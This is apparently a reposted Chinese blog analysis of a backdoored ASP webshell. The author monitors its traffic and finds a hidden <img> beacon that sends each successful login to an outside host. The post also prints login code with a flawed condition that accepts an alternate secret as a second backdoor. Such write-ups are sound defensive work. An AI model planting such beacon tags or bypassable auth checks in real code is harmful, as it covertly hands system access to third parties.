鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 加密解密 > >

webshell后门分析第一篇

来源:互联网 作者:佚名 时间:2015-04-12 10:26
今天一位学员发来了webshell箱子 但是箱子里面没有明显的密码 不像以前的箱子 这种webshell箱子 引起了我莫大的兴趣。 如图: 立马想了一个方案。。随便找了几个webshell 进行爆破 。 几分钟后得到一个webshell 注:webshell 没有加密的 这里没得写解密过程了

  今天一位学员发来了webshell箱子 但是箱子里面没有明显的密码 不像以前的箱子

     这种webshell箱子 引起了我莫大的兴趣。

如图:

  

 

       立马想了一个方案。。随便找了几个webshell 进行爆破 。

        几分钟后得到一个webshell

       注:webshell 没有加密的 这里没得写解密过程了。

       下了个asp小型服务器 打开进程里面 进行监控 输入正确密码 查找一切GET /POST之类的相关连接

       果断有发现 如图所示:

           

 

       留意host 这里估计就是收信的地址 whois 果断得到 箱子作者的QQ邮箱加QQ号 其实我真不想社 俺晚上还有初中聚会岂能表现出闲得蛋疼的样子,果断不扯淡做箱子的人。

       这里感到很奇怪 以往的的webshell箱子 都是获取网址+密码 然后发送到远程服务器。 但是这个webshell很另类。难道我孤陋寡闻。还是 落后了 我的思想。

      看到


<img src='http://www.moonhack.org/web/pr/?"&u&"'></img>
 

 

看到这个标签 我表示作者真的很有水平,【本文来自鸿网互联 (http://www.68idc.cn)】<img>我表示成功登陆 肯定会执行一次 ,所以在远程服务器做一个记录就行了。多隐蔽但是岂能 逃出哥的法眼。

         回想起 我们之前箱子所说 后缀 参数 这里不知道我说什么,请回去看我们第一张高清有码图。根据这个这些 我仔细阅读了这份没有加密的网马 ?果断有所发现:

       如图所示:

              

              跟踪 URL变量 三十二个有木有

       如图所示:

              

       好吧 我仔细看 看到这块代码 感觉不对

 

if session("KKK")<>UserPass then
 
if request.form("pass")<>"" or request("pass")<>"" then
 
if request.form("pass")=UserPass or request.form("pass")=url then
 
session("KKK")=UserPass
 
response.redirect url
 
else
 

最后一个if 有逻辑问题 传入来的变量 等于UserPass或者 等于url 只有满足其中一个就可以登录了。

 

         最后结果如图:

                    

                 ---------------淫荡分割-------

                   

                     分析完毕后 又发来一只网马  好吧 等我聚会回来继续帮你分析


网友评论
<